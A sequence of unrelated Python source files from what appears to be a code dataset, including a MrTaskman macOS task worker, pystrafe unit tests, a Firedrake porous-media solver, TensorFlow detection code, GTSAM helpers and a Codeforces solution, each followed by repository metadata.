device_info.DEVICE_SN)
device_active = False
time.sleep(10)
continue
if not device_active:
logging.info('Device came back online.')
device_active = True
# TODO(jeff.carollo): Wrap this in a catch-all Excepion handler that
# allows us to continue executing in the face of various task errors.
task = self.AssignTask()
if not task:
time.sleep(10)
continue
except KeyboardInterrupt:
logging.info('Caught CTRL+C. Exiting.')
return
task_stream = cStringIO.StringIO()
task_logs = None
self.log_stream_.AddStream(task_stream)
try:
logging.info('Got a task:\n%s\n', json.dumps(task, 'utf-8', indent=2))
config = task['config']
task_id = int(task['id'])
attempt = task['attempts']
# Figure out which of our executors we can use.
executor = None
allowed_executors = config['task']['requirements']['executor']
for allowed_executor in allowed_executors:
try:
executor = self.executors_[allowed_executor]
except KeyError:
pass
if executor is not None:
break
if executor is None:
# TODO: Send error response to server.
# This is probably our fault - we said we could do something
# that we actually couldn't do.
logging.error('No matching executor from %s', allowed_executors)
raise Exception('No allowed executors matched our executors_:\n' +
'%s\nvs.%s\n' % (allowed_executors, self.executors_))
try:
# We've got a valid executor, so use it.
(results, stdout, stderr) = executor(task_id, attempt, task, config)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
continue
finally:
self.log_stream_.RemoveStream(task_stream)
task_logs = task_stream.getvalue().decode('utf-8')
task_stream.close()
try:
results['worker_log'] = task_logs.encode('utf-8')
self.SendResponse(task_id,
stdout,
stderr,
results)
except MrTaskmanUnrecoverableHttpError:
logging.error(
'Unrecoverable MrTaskman HTTP error. Aborting task %d.', task_id)
logging.info('Polling for work...')
# Loop back up and poll for the next task.
def ExecuteTask(self, task_id, attempt, task, config):
logging.info('Recieved task %s', task_id)
try:
tmpdir = package_installer.TmpDir()
# Download the files we need from the server.
files = config.get('files', [])
self.DownloadAndStageFiles(files)
# Install any packages we might need.
# TODO(jeff.carollo): Handle any exceptions raised here.
packages = config.get('packages', [])
self.DownloadAndInstallPackages(packages, tmpdir)
# We probably don't want to run forever. Default to 12 minutes.
timeout = config['task'].get('timeout', '12m')
timeout = parsetime.ParseTimeDelta(timeout)
# Get any environment variables to inject.
env = config['task'].get('env', {})
env = env.update(os.environ)
# Get our command and execute it.
command = config['task']['command']
logging.info('Running command %s', command)
(exit_code, stdout, stderr, execution_time, result_metadata) = (
self.RunCommandRedirectingStdoutAndStderrWithTimeout(
command, env, timeout, tmpdir.GetTmpDir()))
logging.info('Executed %s with result %d', command, exit_code)
results = {
'kind': 'mrtaskman#task_complete_request',
'task_id': task_id,
'attempt': attempt,
'exit_code': exit_code,
'execution_time': execution_time.total_seconds(),
'result_metadata': result_metadata
}
return (results, stdout, stderr)
finally:
tmpdir.CleanUp()
def RunCommandRedirectingStdoutAndStderrWithTimeout(
self, command, env, timeout, cwd):
command = ' '.join([command, '>stdout', '2>stderr'])
# TODO: More precise timing through process info.
begin_time = datetime.datetime.now()
timeout_time = begin_time + timeout
process = subprocess.Popen(args=command,
env=env,
shell=True,
cwd=cwd)
ret = None
while None == ret and (datetime.datetime.now() < timeout_time):
time.sleep(0.02)
ret = process.poll()
finished_time = datetime.datetime.now()
if finished_time >= timeout_time and (None == ret):
logging.info('command %s timed out.', command)
process.terminate()
process.wait()
ret = -99
execution_time = finished_time - begin_time
try:
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
except IOError, e:
logging.error('stdout was not written.')
stdout = file(os.path.join(cwd, 'stdout'), 'w')
stdout.write('No stdout.')
stdout.flush()
stdout.close()
stdout = file(os.path.join(cwd, 'stdout'), 'rb')
try:
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
except IOError, e:
logging.error('stderr was not written.')
stderr = file(os.path.join(cwd, 'stderr'), 'w')
stderr.write('No stderr.')
stderr.flush()
stderr.close()
stderr = file(os.path.join(cwd, 'stderr'), 'rb')
try:
result_metadata_file = file(os.path.join(cwd, 'result_metadata'), 'r')
result_metadata = json.loads(result_metadata_file.read().decode('utf-8'))
except:
result_metadata = None
return (ret, stdout, stderr, execution_time, result_metadata)
def DownloadAndStageFiles(self, files):
logging.info('Not staging files: %s', files)
# TODO: Stage files.
def DownloadAndInstallPackages(self, packages, tmpdir):
# TODO(jeff.carollo): Create a package cache if things take off.
for package in packages:
attempts = 0
while True:
try:
# TODO(jeff.carollo): Put package cache code here.
if self.use_cache_:
self.package_cache_.CopyToDirectory(
package, tmpdir.GetTmpDir(),
package_installer.DownloadAndInstallPackage)
else:
package_installer.DownloadAndInstallPackage(
package['name'], package['version'],
tmpdir.GetTmpDir())
break
except urllib2.HTTPError, e:
logging.error('Got HTTPError %d trying to grab package %s.%s: %s',
e.code, package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
except (urllib2.URLError, httplib.IncompleteRead,
httplib.BadStatusLine, httplib.HTTPException), e:
logging.error('Got URLError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
logging.info('Retrying in 10')
attempts += 1
# TODO(jeff.carollo): Figure out a robust way to do this.
# Likely need to just try a few times to get around Internet blips
# then mark task as failed for package reasons.
if attempts < 10:
time.sleep(10)
continue
else:
logging.error('Failed to grab package for 100 attempts. Aborting.')
raise MrTaskmanUnrecoverableHttpError(e)
except IOError, e:
logging.error('Got IOError trying to grab package %s.%s: %s',
package['name'], package['version'], e)
raise MrTaskmanUnrecoverableHttpError(e)
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
sys.stderr.write('%s\n' % e)
sys.exit(1)
return
# Set default socket timeout to 2 hours so that we catch missing timeouts.
socket.setdefaulttimeout(2 * 60 * 60)
if not FLAGS.log_filename:
sys.stderr.write('Flag --log_filename is required.\n')
sys.exit(-9)
return
try:
from third_party import portalocker
log_file = file(FLAGS.log_filename, 'a+')
portalocker.lock(log_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
except Exception, e:
logging.exception(e)
print 'Could not get exclusive lock.'
sys.exit(-10)
return
try:
FORMAT = '%(asctime)-15s %(message)s'
log_stream = split_stream.SplitStream(sys.stdout, log_file)
logging.basicConfig(format=FORMAT, level=logging.DEBUG,
stream=log_stream)
macos_worker = MacOsWorker(FLAGS.worker_name, log_stream=log_stream)
# Run forever, executing tasks from the server when available.
macos_worker.PollAndExecute()
finally:
logging.shutdown()
log_file.flush()
portalocker.unlock(log_file)
log_file.close()
if __name__ == '__main__':
main(sys.argv)
| 34.501149 | 80 | 0.640259 | 11,647 | 0.776053 | 0 | 0 | 0 | 0 | 0 | 0 | 4,383 | 0.292044 |
35325ac77e634192fcf4559a3df2220675e50312 | 1,421 | py | Python | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | 2 | 2020-08-03T15:21:42.000Z | 2022-02-13T15:35:28.000Z | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | null | null | null | pystrafe/tests/test_basic.py | Matherunner/pystrafe | 102533e7f011c1d6167990bb86653c18a5ae80b0 | [
"MIT"
] | null | null | null | from pytest import approx, warns, raises
from pystrafe import basic
def test_collide():
v = [-1000, 123, 456]
basic.collide(v, [1, 0, 0])
assert v == [0, 123, 456]
def test_collide_out_of_plane():
v = [100, 100, 100]
with warns(RuntimeWarning):
basic.collide(v, [1, 0, 0])
assert v == [100, 100, 100]
def test_collide_2d():
v = [-200, 200]
with raises(IndexError):
basic.collide(v, [1, 0, 0])
def test_collide_b_non_1():
v = [-100, 0, 0]
basic.collide(v, [1, 0, 0], 1.5)
assert v == [50, 0, 0]
def test_collide_b_lt_1():
v = [-100, 0, 0]
basic.collide(v, [1, 0, 0], 0.99999)
assert v == [0, 0, 0]
def test_friction():
v = [0, 100]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 96]
v = [2000, 0]
basic.friction(v, 0.001, basic.E, basic.k)
assert v == [1992, 0]
def test_friction_zero_speed():
v = [0, 0]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 0]
def test_frction_3d():
v = [40, 30, 1234567]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [36.8, 27.6, 1234567]
def test_frction_low_speed():
v = [1, 1]
basic.friction(v, 0.01, basic.E, basic.k)
assert v == [0, 0]
v = [0, 0.09]
basic.friction(v, 1e-10, basic.E, basic.k)
assert v == [0, 0.09]
basic.friction(v, 10000000, basic.E, basic.k)
assert v == [0, 0.09]
| 24.084746 | 49 | 0.560169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
3533195f13e3ea818f2af16e979fbb241e157d75 | 6,108 | py | Python | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | 1 | 2020-09-03T14:07:05.000Z | 2020-09-03T14:07:05.000Z | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | null | null | null | MWE/SDHM/sdhm_dpp_exact_sc.py | volpatto/porousdrake | ffc2cadebc0415daa86fbeab130489d095b76193 | [
"MIT"
] | 1 | 2020-11-15T18:05:43.000Z | 2020-11-15T18:05:43.000Z | from firedrake import *
import numpy as np
from firedrake.petsc import PETSc
from firedrake import COMM_WORLD
try:
import matplotlib.pyplot as plt
plt.rcParams["contour.corner_mask"] = False
plt.close("all")
except:
warning("Matplotlib not imported")
nx, ny = 4, 4
Lx, Ly = 1.0, 1.0
quadrilateral = False
mesh = RectangleMesh(nx, ny, Lx, Ly, quadrilateral=quadrilateral)
plot(mesh)
plt.axis("off")
degree = 1
pressure_family = "DG"
velocity_family = "DG"
trace_family = "HDiv Trace"
U = VectorFunctionSpace(mesh, velocity_family, degree)
V = FunctionSpace(mesh, pressure_family, degree)
T = FunctionSpace(mesh, trace_family, degree)
W = U * V * T * U * V * T
# Trial and test functions
DPP_solution = Function(W)
u1, p1, lambda1, u2, p2, lambda2 = split(DPP_solution)
v1, q1, mu1, v2, q2, mu2 = TestFunctions(W)
# Mesh entities
n = FacetNormal(mesh)
x, y = SpatialCoordinate(mesh)
h = CellDiameter(mesh)
#################################################
# *** Model parameters
#################################################
mu0 = Constant(1.0)
k1 = Constant(1.0)
k2 = Constant(0.1)
b_factor = Constant(1.0)
def alpha1():
return mu0 / k1
def invalpha1():
return 1.0 / alpha1()
def alpha2():
return mu0 / k2
def invalpha2():
return 1.0 / alpha2()
#################################################
#################################################
#################################################
# Exact solution and source term projection
eta = sqrt(b_factor * (k1 + k2) / (k1 * k2))
p_exact_1 = mu0 / pi * exp(pi * x) * sin(pi * y) - mu0 / (b_factor * k1) * exp(eta * y)
p_exact_2 = mu0 / pi * exp(pi * x) * sin(pi * y) + mu0 / (b_factor * k2) * exp(eta * y)
p_e_1 = Function(W.sub(1)).interpolate(p_exact_1)
p_e_1_tr = Function(T).interpolate(p_exact_1)
p_e_1.rename("Exact macro pressure", "label")
p_e_2 = Function(W.sub(4)).interpolate(p_exact_2)
p_e_2_tr = Function(T).interpolate(p_exact_2)
p_e_2.rename("Exact micro pressure", "label")
v_e_1 = Function(W.sub(0), name="Exact macro velocity")
v_e_1.project(-(k1 / mu0) * grad(p_e_1))
v_e_2 = Function(W.sub(3), name="Exact macro velocity")
v_e_2.project(-(k2 / mu0) * grad(p_e_2))
plot(p_e_1)
plot(p_e_2)
# Source term
rhob1, rhob2 = Constant((0.0, 0.0)), Constant((0.0, 0.0))
f = Constant(0.0)
# Stabilizing parameter
beta_0 = Constant(1.0e-2)
beta = beta_0 / h
beta_avg = beta_0 / h("+")
delta_0 = Constant(1.0)
delta_1 = Constant(-0.5)
delta_2 = Constant(0.5)
delta_3 = Constant(0.0)
# Mixed classical terms
a = (dot(alpha1() * u1, v1) - div(v1) * p1 - delta_0 * q1 * div(u1)) * dx
a += (dot(alpha2() * u2, v2) - div(v2) * p2 - delta_0 * q2 * div(u2)) * dx
a += delta_0 * q1 * (b_factor * invalpha1() / k1) * (p2 - p1) * dx
a += delta_0 * q2 * (b_factor * invalpha2() / k2) * (p1 - p2) * dx
L = -delta_0 * dot(rhob1, v1) * dx
L += -delta_0 * dot(rhob2, v2) * dx
# Stabilizing terms
###
a += (
delta_1
* inner(invalpha1() * (alpha1() * u1 + grad(p1)), delta_0 * alpha1() * v1 + grad(q1))
* dx
)
a += (
delta_1
* inner(invalpha2() * (alpha2() * u2 + grad(p2)), delta_0 * alpha2() * v2 + grad(q2))
* dx
)
###
a += delta_2 * alpha1() * div(u1) * div(v1) * dx
a += delta_2 * alpha2() * div(u2) * div(v2) * dx
L += delta_2 * alpha1() * (b_factor * invalpha1() / k1) * (p2 - p1) * div(v1) * dx
L += delta_2 * alpha2() * (b_factor * invalpha2() / k2) * (p1 - p2) * div(v2) * dx
###
a += delta_3 * inner(invalpha1() * curl(alpha1() * u1), curl(alpha1() * v1)) * dx
a += delta_3 * inner(invalpha2() * curl(alpha2() * u2), curl(alpha2() * v2)) * dx
# Hybridization terms
###
a += lambda1("+") * jump(v1, n) * dS + mu1("+") * jump(u1, n) * dS
a += lambda2("+") * jump(v2, n) * dS + mu2("+") * jump(u2, n) * dS
###
a += beta_avg * invalpha1()("+") * (lambda1("+") - p1("+")) * (mu1("+") - q1("+")) * dS
a += beta_avg * invalpha2()("+") * (lambda2("+") - p2("+")) * (mu2("+") - q2("+")) * dS
# Weakly imposed BC from hybridization
a += beta * invalpha1() * (lambda1 - p_e_1) * mu1 * ds
a += beta * invalpha1() * (lambda2 - p_e_2) * mu2 * ds
a += (p_e_1 * dot(v1, n) + mu1 * (dot(u1, n) - dot(v_e_1, n))) * ds
a += (p_e_2 * dot(v2, n) + mu2 * (dot(u2, n) - dot(v_e_2, n))) * ds
F = a - L
# Solving SC below
PETSc.Sys.Print("*******************************************\nSolving using static condensation.\n")
solver_parameters = {
"snes_type": "ksponly",
"pmat_type": "matfree",
# 'ksp_view': True,
"ksp_type": "lgmres",
"ksp_monitor_true_residual": True,
# 'snes_monitor': True,
"ksp_rtol": 1.0e-5,
"ksp_atol": 1.0e-5,
"pc_type": "fieldsplit",
"pc_fieldsplit_0_fields": "0,1,2",
"pc_fieldsplit_1_fields": "3,4,5",
"fieldsplit_0": {
"pmat_type": "matfree",
"ksp_type": "preonly",
"pc_type": "python",
"pc_python_type": "firedrake.SCPC",
"pc_sc_eliminate_fields": "0, 1",
"condensed_field": {
"ksp_type": "preonly",
"pc_type": "lu",
"pc_factor_mat_solver_type": "mumps",
},
},
"fieldsplit_1": {
"pmat_type": "matfree",
"ksp_type": "preonly",
"pc_type": "python",
"pc_python_type": "firedrake.SCPC",
"pc_sc_eliminate_fields": "0, 1",
"condensed_field": {
"ksp_type": "preonly",
"pc_type": "lu",
"pc_factor_mat_solver_type": "mumps",
},
},
}
problem_flow = NonlinearVariationalProblem(F, DPP_solution)
solver_flow = NonlinearVariationalSolver(problem_flow, solver_parameters=solver_parameters)
solver_flow.solve()
# Writing solution in a .vtk file and plotting the solution
plot(DPP_solution.sub(1))
plot(DPP_solution.sub(4))
plt.show()
output_file = File("dpp_sdhm_exact.pvd")
v1_sol = DPP_solution.sub(0)
v1_sol.rename("Macro velocity", "label")
p1_sol = DPP_solution.sub(1)
p1_sol.rename("Macro pressure", "label")
v2_sol = DPP_solution.sub(3)
v2_sol.rename("Micro velocity", "label")
p2_sol = DPP_solution.sub(4)
p2_sol.rename("Micro pressure", "label")
output_file.write(p1_sol, v1_sol, p2_sol, v2_sol, p_e_1, v_e_1, p_e_2, v_e_2)
| 30.38806 | 100 | 0.58628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,659 | 0.271611 |
3533347e3f6dd109c1cd29acee7a5024f75c5d7b | 329 | py | Python | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | """Definition and configuration of data sets"""
import functools
from data_sets import data_set
@functools.lru_cache(maxsize=None)
def data_sets() -> ['data_set.DataSet']:
"""All available data sets"""
return []
def charts_color() -> str:
"""The color (rgb hex code) to be used in charts"""
return '#008000' | 20.5625 | 55 | 0.680851 | 0 | 0 | 0 | 0 | 123 | 0.37386 | 0 | 0 | 154 | 0.468085 |
353598ee45be370c07fb9e8b962ed07021b6f3e8 | 578 | py | Python | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | 52 | 2018-08-31T05:57:04.000Z | 2019-02-19T15:26:40.000Z | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | class AbstractException(Exception):
"""Abstract exception for project"""
def __init__(self, code, message):
"""
Constructor
:param int code: error code
:param str message: error message
"""
self._code = code
self._message = message
@property
def code(self):
"""
Getter code
:rtype: int
"""
return self._code
@property
def message(self): # pragma no cover
"""
Getter message
:rtype: str
"""
return self._message
| 18.645161 | 41 | 0.520761 | 577 | 0.99827 | 0 | 0 | 268 | 0.463668 | 0 | 0 | 282 | 0.487889 |
3535c2f41fec283317a2615b85df36199539b828 | 163 | py | Python | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | from kafka import KafkaConsumer
consumer = KafkaConsumer('test-topic', bootstrap_servers='localhost:9092')
print("listening")
for msg in consumer:
print(msg)
| 23.285714 | 74 | 0.773006 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.239264 |
3535cde306fc5cbd97370f8331149b5039014dd2 | 9,354 | py | Python | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | null | null | null | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | 1 | 2016-12-18T16:07:55.000Z | 2016-12-18T16:07:55.000Z | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
import tensorflow as tf
from recognition.utils import train_utils, googlenet_load
try:
from tensorflow.models.rnn import rnn_cell
except ImportError:
rnn_cell = tf.nn.rnn_cell
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
random.seed(0)
np.random.seed(0)
@ops.RegisterGradient("Hungarian")
def _hungarian_grad(op, *args):
return map(array_ops.zeros_like, op.inputs)
def build_lstm_inner(H, lstm_input):
'''
build lstm decoder
'''
lstm_cell = rnn_cell.BasicLSTMCell(H['lstm_size'], forget_bias=0.0, state_is_tuple=False)
if H['num_lstm_layers'] > 1:
lstm = rnn_cell.MultiRNNCell([lstm_cell] * H['num_lstm_layers'], state_is_tuple=False)
else:
lstm = lstm_cell
batch_size = H['batch_size'] * H['grid_height'] * H['grid_width']
state = tf.zeros([batch_size, lstm.state_size])
outputs = []
with tf.variable_scope('RNN', initializer=tf.random_uniform_initializer(-0.1, 0.1)):
for time_step in range(H['rnn_len']):
if time_step > 0: tf.get_variable_scope().reuse_variables()
output, state = lstm(lstm_input, state)
outputs.append(output)
return outputs
def build_overfeat_inner(H, lstm_input):
'''
build simple overfeat decoder
'''
if H['rnn_len'] > 1:
raise ValueError('rnn_len > 1 only supported with use_lstm == True')
outputs = []
initializer = tf.random_uniform_initializer(-0.1, 0.1)
with tf.variable_scope('Overfeat', initializer=initializer):
w = tf.get_variable('ip', shape=[H['later_feat_channels'], H['lstm_size']])
outputs.append(tf.matmul(lstm_input, w))
return outputs
def deconv(x, output_shape, channels):
k_h = 2
k_w = 2
w = tf.get_variable('w_deconv', initializer=tf.random_normal_initializer(stddev=0.01),
shape=[k_h, k_w, channels[1], channels[0]])
y = tf.nn.conv2d_transpose(x, w, output_shape, strides=[1, k_h, k_w, 1], padding='VALID')
return y
def rezoom(H, pred_boxes, early_feat, early_feat_channels, w_offsets, h_offsets):
'''
Rezoom into a feature map at multiple interpolation points in a grid.
If the predicted object center is at X, len(w_offsets) == 3, and len(h_offsets) == 5,
the rezoom grid will look as follows:
[o o o]
[o o o]
[o X o]
[o o o]
[o o o]
Where each letter indexes into the feature map with bilinear interpolation
'''
grid_size = H['grid_width'] * H['grid_height']
outer_size = grid_size * H['batch_size']
indices = []
for w_offset in w_offsets:
for h_offset in h_offsets:
indices.append(train_utils.bilinear_select(H,
pred_boxes,
early_feat,
early_feat_channels,
w_offset, h_offset))
interp_indices = tf.concat(0, indices)
rezoom_features = train_utils.interp(early_feat,
interp_indices,
early_feat_channels)
rezoom_features_r = tf.reshape(rezoom_features,
[len(w_offsets) * len(h_offsets),
outer_size,
H['rnn_len'],
early_feat_channels])
rezoom_features_t = tf.transpose(rezoom_features_r, [1, 2, 0, 3])
return tf.reshape(rezoom_features_t,
[outer_size,
H['rnn_len'],
len(w_offsets) * len(h_offsets) * early_feat_channels])
def build_forward(H, x, phase, reuse):
'''
Construct the forward model
'''
grid_size = H['grid_width'] * H['grid_height']
outer_size = grid_size * H['batch_size']
input_mean = 117.
x -= input_mean
cnn, early_feat, _ = googlenet_load.model(x, H, reuse)
early_feat_channels = H['early_feat_channels']
early_feat = early_feat[:, :, :, :early_feat_channels]
if H['deconv']:
size = 3
stride = 2
pool_size = 5
with tf.variable_scope("deconv", reuse=reuse):
w = tf.get_variable('conv_pool_w', shape=[size, size, H['later_feat_channels'], H['later_feat_channels']],
initializer=tf.random_normal_initializer(stddev=0.01))
cnn_s = tf.nn.conv2d(cnn, w, strides=[1, stride, stride, 1], padding='SAME')
cnn_s_pool = tf.nn.avg_pool(cnn_s[:, :, :, :256], ksize=[1, pool_size, pool_size, 1],
strides=[1, 1, 1, 1], padding='SAME')
cnn_s_with_pool = tf.concat(3, [cnn_s_pool, cnn_s[:, :, :, 256:]])
cnn_deconv = deconv(cnn_s_with_pool, output_shape=[H['batch_size'], H['grid_height'], H['grid_width'], 256],
channels=[H['later_feat_channels'], 256])
cnn = tf.concat(3, (cnn_deconv, cnn[:, :, :, 256:]))
elif H['avg_pool_size'] > 1:
pool_size = H['avg_pool_size']
cnn1 = cnn[:, :, :, :700]
cnn2 = cnn[:, :, :, 700:]
cnn2 = tf.nn.avg_pool(cnn2, ksize=[1, pool_size, pool_size, 1],
strides=[1, 1, 1, 1], padding='SAME')
cnn = tf.concat(3, [cnn1, cnn2])
cnn = tf.reshape(cnn,
[H['batch_size'] * H['grid_width'] * H['grid_height'], H['later_feat_channels']])
initializer = tf.random_uniform_initializer(-0.1, 0.1)
with tf.variable_scope('decoder', reuse=reuse, initializer=initializer):
scale_down = 0.01
lstm_input = tf.reshape(cnn * scale_down, (H['batch_size'] * grid_size, H['later_feat_channels']))
if H['use_lstm']:
lstm_outputs = build_lstm_inner(H, lstm_input)
else:
lstm_outputs = build_overfeat_inner(H, lstm_input)
pred_boxes = []
pred_logits = []
for k in range(H['rnn_len']):
output = lstm_outputs[k]
if phase == 'train':
output = tf.nn.dropout(output, 0.5)
box_weights = tf.get_variable('box_ip%d' % k,
shape=(H['lstm_size'], 4))
conf_weights = tf.get_variable('conf_ip%d' % k,
shape=(H['lstm_size'], H['num_classes']))
pred_boxes_step = tf.reshape(tf.matmul(output, box_weights) * 50,
[outer_size, 1, 4])
pred_boxes.append(pred_boxes_step)
pred_logits.append(tf.reshape(tf.matmul(output, conf_weights),
[outer_size, 1, H['num_classes']]))
pred_boxes = tf.concat(1, pred_boxes)
pred_logits = tf.concat(1, pred_logits)
pred_logits_squash = tf.reshape(pred_logits,
[outer_size * H['rnn_len'], H['num_classes']])
pred_confidences_squash = tf.nn.softmax(pred_logits_squash)
pred_confidences = tf.reshape(pred_confidences_squash,
[outer_size, H['rnn_len'], H['num_classes']])
if H['use_rezoom']:
pred_confs_deltas = []
pred_boxes_deltas = []
w_offsets = H['rezoom_w_coords']
h_offsets = H['rezoom_h_coords']
num_offsets = len(w_offsets) * len(h_offsets)
rezoom_features = rezoom(H, pred_boxes, early_feat, early_feat_channels, w_offsets, h_offsets)
if phase == 'train':
rezoom_features = tf.nn.dropout(rezoom_features, 0.5)
for k in range(H['rnn_len']):
delta_features = tf.concat(1, [lstm_outputs[k], rezoom_features[:, k, :] / 1000.])
dim = 128
delta_weights1 = tf.get_variable(
'delta_ip1%d' % k,
shape=[H['lstm_size'] + early_feat_channels * num_offsets, dim])
# TODO: add dropout here ?
ip1 = tf.nn.relu(tf.matmul(delta_features, delta_weights1))
if phase == 'train':
ip1 = tf.nn.dropout(ip1, 0.5)
delta_confs_weights = tf.get_variable(
'delta_ip2%d' % k,
shape=[dim, H['num_classes']])
if H['reregress']:
delta_boxes_weights = tf.get_variable(
'delta_ip_boxes%d' % k,
shape=[dim, 4])
pred_boxes_deltas.append(tf.reshape(tf.matmul(ip1, delta_boxes_weights) * 5,
[outer_size, 1, 4]))
scale = H.get('rezoom_conf_scale', 50)
pred_confs_deltas.append(tf.reshape(tf.matmul(ip1, delta_confs_weights) * scale,
[outer_size, 1, H['num_classes']]))
pred_confs_deltas = tf.concat(1, pred_confs_deltas)
if H['reregress']:
pred_boxes_deltas = tf.concat(1, pred_boxes_deltas)
return pred_boxes, pred_logits, pred_confidences, pred_confs_deltas, pred_boxes_deltas
return pred_boxes, pred_logits, pred_confidences
| 41.758929 | 120 | 0.557943 | 0 | 0 | 0 | 0 | 114 | 0.012187 | 0 | 0 | 1,456 | 0.155655 |
35361b12a2145f1e12f1ea888df65fc33ccd836c | 1,627 | py | Python | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 5 | 2021-12-19T02:58:48.000Z | 2021-12-22T20:12:54.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 2 | 2022-01-08T14:58:20.000Z | 2022-01-10T02:25:31.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: linear.ipynb (unless otherwise specified).
__all__ = ['vv', 'denoising_MRF']
# Cell
import numpy as np
import gtsam
from gtsam import noiseModel
from .display import show
from typing import Dict
# Cell
def vv(keys_vectors: Dict[int, np.ndarray]):
"""Create a VectorValues from a dict"""
result = gtsam.VectorValues()
for j, v in keys_vectors.items():
result.insert(j, v)
return result
# Cell
def denoising_MRF(M: int, N: int, sigma = 0.5, smoothness_sigma=0.5):
"""Create MxN MRF
@returns graph and symbols used for rows.
"""
row_symbols = [chr(ord('a')+row) for row in range(M)]
keys = {(row, col): gtsam.symbol(row_symbols[row], col+1)
for row in range(M) for col in range(N)}
rng = np.random.default_rng(42)
data = rng.normal(loc=0, scale=sigma, size=(M, N, 1))
data_model = noiseModel.Isotropic.Sigmas([sigma])
smoothness_model = noiseModel.Isotropic.Sigmas([smoothness_sigma])
I = np.eye(1, 1, dtype=float)
zero = np.zeros((1, 1))
graph = gtsam.GaussianFactorGraph()
for row in range(M):
for col in range(N):
# add data terms:
j = keys[(row, col)]
graph.add(j, I, np.array(data[row, col]), data_model)
# add smoothness terms:
if col > 0:
j1 = keys[(row, col-1)]
graph.add(j, I, j1, -I, zero, smoothness_model)
if row > 0:
j2 = keys[(row-1, col)]
graph.add(j, I, j2, -I, zero, smoothness_model)
return graph, row_symbols
# Cell
| 29.053571 | 86 | 0.598648 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 287 | 0.176398 |
3539dc514be01a0a70e432b9eaf2771e8b35648e | 899 | py | Python | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | def solve(n, m, A, B):
ans = 0
ones, twos = [], []
for i in xrange(n):
if B[i] == 1: ones += A[i],
else: twos += A[i],
ones.sort()
twos.sort()
i, j = len(ones)-1, len(twos)-1
while m > 0 and (i >= 0 or j >= 0):
if i >= 0 and ones[i] >= m:
m -= ones[i]
ans += 1
break
mem1, mem2 = float('-inf'), float('-inf')
if i == 0: mem1 = ones[i]
elif i > 0: mem1 = ones[i] + ones[i-1]
if j >= 0: mem2 = twos[j]
if mem1 >= mem2:
m -= ones[i]
i -= 1
ans += 1
else:
m -= mem2
j -= 1
ans += 2
return -1 if m > 0 else ans
for _ in xrange(int(raw_input())):
n, m = map(int, raw_input().split())
A = map(int, raw_input().split())
B = map(int, raw_input().split())
print solve(n, m, A, B)
| 26.441176 | 49 | 0.404894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.013348 |
